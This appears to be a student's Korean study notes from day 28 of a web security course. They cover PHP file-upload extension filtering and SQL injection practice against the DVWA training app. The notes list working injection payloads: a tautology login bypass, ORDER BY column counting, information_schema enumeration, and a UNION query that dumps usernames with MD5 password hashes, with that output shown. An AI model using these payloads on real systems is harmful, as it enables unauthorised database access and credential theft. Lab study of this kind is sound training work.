28일차



step1
파일 업로드
업로드 enctype = "multipart/form-data" 코드 존재


step2
특정확장자만 허용
$allowedExtensions=['jpg','jpeg','png','gif','pdf','hwp','hpwx','excel','ppt'];
이 이외에는 업로드 금지
if(!in_array($extension,$allowedExtensions)){
         die('허용되지 않는 파일 형식');
      
      }

step3
확장자랑 파일 타입확인

$allowedExtensions=['jpg','jpeg','png','gif','pdf','hwp','hpwx','excel','ppt'];
$allowedType=['image/jpeg'];


SQL인젝션
DML
select from
select * from users;
select idx, id_param from users;
select id_param from users where id_param="admin";
select id_param from users where id_param="1" or "1"="1";

insert into
update set
delete from


1' or '1' = '1
login2_ok.php 코드

결과

  

----------------------

1' ORDER BY 1#
1' ORDER BY 2#
1' ORDER BY 3#(X)
1' UNION SELECT 1,2#
1' UNION SELECT 1,2,3#(X)


' UNION SELECT schema_name,2 from information_schema.schemata#
' UNION SELECT table_name,2 from information_schema.tables where table_schema='dvwa'#
' UNION SELECT column_name,2 from information_schema.columns where table_schema='dvwa' and table_name='users'#

  



' UNION SELECT user,password from users#

ID: ' UNION SELECT user,password from users#s
First name: admin
Surname: 827ccb0eea8a706c4c34a16891f84e7b

ID: ' UNION SELECT user,password from users#
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03

ID: ' UNION SELECT user,password from users#
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b

ID: ' UNION SELECT user,password from users#
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7

ID: ' UNION SELECT user,password from users#
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99




1' UNION SELECT name,pw from users#
md5 자동화 프로그램 만들기